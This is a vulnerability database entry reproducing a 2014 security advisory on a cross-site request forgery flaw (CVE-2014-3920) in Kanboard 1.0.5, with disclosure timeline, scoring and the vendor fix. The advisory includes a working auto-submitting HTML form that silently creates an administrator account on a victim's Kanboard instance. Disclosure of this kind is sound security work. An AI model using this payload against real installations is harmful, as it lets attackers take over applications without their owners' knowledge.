Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHigh-Tech Bridge1337DAY-ID-22408
HistoryJul 06, 2014 - 12:00 a.m.

Kanboard 1.0.5 Cross Site Request Forgery Vulnerability

2014-07-0600:00:00
High-Tech Bridge
0day.today
27

0.004 Low

EPSS

Percentile

73.8%

JSON

Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.

Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication:  May 28, 2014  [without technical details]
Vendor Notification: May 28, 2014 
Vendor Patch: June 30, 2014 
Public Disclosure: July 2, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.


1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920

The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. 

Simple CSRF exploit below creates new admin account with login "immuniweb" and password "password":


<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to Kanboard 1.0.6

More Information:
http://kanboard.net/news

#  0day.today [2018-01-01]  #

Related

cve 1
packetstorm 1
debiancve 1
prion 1
htbridge 1
openvas 1
securityvulns 2
cvelist 1
nvd 1
cve
cve
CVE-2014-3920
2014-07-03 14:55:08
packetstorm
packetstorm
Kanboard 1.0.5 Cross Site Request Forgery
2014-07-02 00:00:00
debiancve
debiancve
CVE-2014-3920
2014-07-03 14:55:08
prion
prion
Cross site request forgery (csrf)
2014-07-03 14:55:00
htbridge
htbridge
Cross-Site Request Forgery (CSRF) in Kanboard
2014-05-28 00:00:00
openvas
openvas
Kanboard < 1.0.6 CSRF Vulnerability
2015-12-04 00:00:00
securityvulns
securityvulns
Cross-Site Request Forgery &#40;CSRF&#41; in Kanboard
2014-10-15 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-10-15 00:00:00
cvelist
cvelist
CVE-2014-3920
2014-07-03 14:00:00
nvd
nvd
CVE-2014-3920
2014-07-03 14:55:08

0.004 Low

EPSS

Percentile

73.8%

JSON
Related for 1337DAY-ID-22408
cve1packetstorm1debiancve1prion1htbridge1openvas1securityvulns2cvelist1nvd1